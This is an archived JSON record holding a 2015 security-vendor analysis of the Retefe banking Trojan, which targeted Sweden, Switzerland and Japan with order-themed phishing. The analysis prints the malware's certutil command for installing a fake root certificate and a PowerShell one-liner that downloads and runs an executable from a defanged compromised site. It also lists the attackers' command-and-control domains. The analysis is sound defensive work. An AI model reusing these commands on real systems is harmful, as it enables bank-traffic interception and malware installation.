{
	"id": "f26cc24a-d7d6-451b-8f50-4493c00480b1",
	"created_at": "2026-04-06T00:16:18.493504Z",
	"updated_at": "2026-04-10T13:12:08.068309Z",
	"deleted_at": null,
	"sha1_hash": "6d3516b0d17a1a4220c0c0802591e101d252efe7",
	"title": "Retefe Banking Trojan Targets Sweden, Switzerland and Japan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 194657,
	"plain_text": "Retefe Banking Trojan Targets Sweden, Switzerland and Japan\r\nBy Brandon Levene, Robert Falcone, Josh Grunzweig, Bryan Lee, Ryan Olson\r\nPublished: 2015-08-20 · Archived: 2026-04-05 20:33:01 UTC\r\nRetefe is one of the most targeted banking Trojans currently in the wild. While other families such as Zeus and\r\nCitadel are widely adopted by attackers targeting banking websites around the world, Retefe is consistently used\r\nto target victims in Sweden, Switzerland and Japan.\r\nIn the last two weeks we have detected a surge of e-mails using AutoFocus, each carrying the Retefe Trojan and\r\ntargeting organizations in Western Europe and Japan.\r\nFigure 1: AutoFocus map of recent Retefe Trojan recipients\r\nThe attack e-mails are using a variety of “order” and “receipt” themes, each tailored to the country they are\r\ntargeting and using dated file names to make them appear more relevant. The e-mails most often claim to be from\r\na local electronics retailer.\r\nFigure 2: Retefe sample delivered to Swedish target.\r\nOn a global scale, Retefe is a rather small threat, but that appears to be by design. The malware hijacks\r\nconnections to Swiss, Swedish and Japanese financial institutions to assist the attacker in committing fraud. The\r\nhttps://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/\r\nPage 1 of 3\n\nmalware carried in the most recent campaigns also downloads and installs the Smoke Loader Trojan, which is a\r\nmodular backdoor capable of stealing credentials and installing additional malware.\r\nRetefe Behavior\r\nRetefe is different from most banking Trojans, which typically attack web browser software to capture login\r\ncredentials before they are encrypted with SSL and sent to the bank’s web server. Instead, Retefe uses the\r\nWindows PowerShell to execute a series of commands that installs a new root certificate on the system and a\r\nproxy configuration to re-route the traffic to the targeted banking websites.\r\nThe Retefe Trojan writes the root certificate to the disk and then uses the following command to install it on the\r\nsytem.\r\ncertutil -addstore -f -user ROOT ProgramData\\cert512121.der\r\nRetefe has used many certificates in the past, but the latest one is a fake “thawte Inc.” certificate.\r\nFigure 3:  Fake “thawte, Inc.” Root Certificate installed by Retefe.\r\nAfter installing the certificate, Retefe makes a request to a server over HTTPS to retrieve JavaScript code that will\r\nreconfigure the system proxy for web browsing to route traffic for specific banking domains through a server\r\ncontrolled by the attacker.  The proxy server performs a man-in-the-middle attack against the traffic, decrypting\r\nand possibly modifying the request before re-encrypting the data and passing it on to the bank. Retefe installs the\r\nnew root certificate to prevent users from receiving a notification that the website they are contacting should not\r\nbe trusted.\r\nThe Retefe command and control server appears to only return this proxy configuration code if the infected host is\r\nlocated in Switzerland, Sweden or Japan. Retefe changes command and control servers frequently, but the most\r\nrecent campaigns use domains that mimic the names of VPN services, including:\r\nsecurevpnalarm.net\r\nhsshvpn.net\r\nhttps://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/\r\nPage 2 of 3\n\nAfter installing the certificate and reconfiguring the system proxy, Retefe uses another PowerShell command to\r\ndownload an additional executable. In many cases we have identified this malware as a variant of Smoke Loader,\r\na modular backdoor Trojan capable of stealing credentials from the infected system.\r\nRetefe variants download additional malware from multiple URLs, but in most cases the server hosting the\r\nexecutable is a compromised website hosted in the country being targeted by the sample. Below is one example of\r\nthe PowerShell script that initiates the download and executes it.\r\npowershell.exe -Command (New-Object System.Net.WebClient).DownloadFile('http://www.schweizerhof-wetzikon[.]ch/images/rtucrtmirumctrutbitueriumxe/ivotyimoyctorieotcmir.exe' 'ProgramData\\Microsoft-KB512118.exe');(New-Object -com Shell.Application).ShellExecute('ProgramData\\Microsoft-KB512118.exe');\r\nWe suspect the actors behind Retefe began downloading Smoke Loader to help monetize infection of systems\r\noutside of their three targeted nations.\r\nConclusion\r\nWhile Retefe’s distribution is small on a global scale, its attacks are specifically targeted at online banking\r\ncustomers in just a few countries. The most recent campaign shows that Retefe may also threaten users in other\r\ncountries as they begin using their infections to install additional malware.\r\nPalo Alto Networks WildFire identifies Retefe and Smoke Loader samples as malicious and AutoFocus users can\r\nidentify these samples using the SmokeLoader and Retefe tags.\r\nSource: https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/\r\nhttps://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/"
	],
	"report_names": [
		"retefe-banking-trojan-targets-sweden-switzerland-and-japan"
	],
	"threat_actors": [],
	"ts_created_at": 1775434578,
	"ts_updated_at": 1775826728,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d3516b0d17a1a4220c0c0802591e101d252efe7.pdf",
		"text": "https://archive.orkl.eu/6d3516b0d17a1a4220c0c0802591e101d252efe7.txt",
		"img": "https://archive.orkl.eu/6d3516b0d17a1a4220c0c0802591e101d252efe7.jpg"
	}
}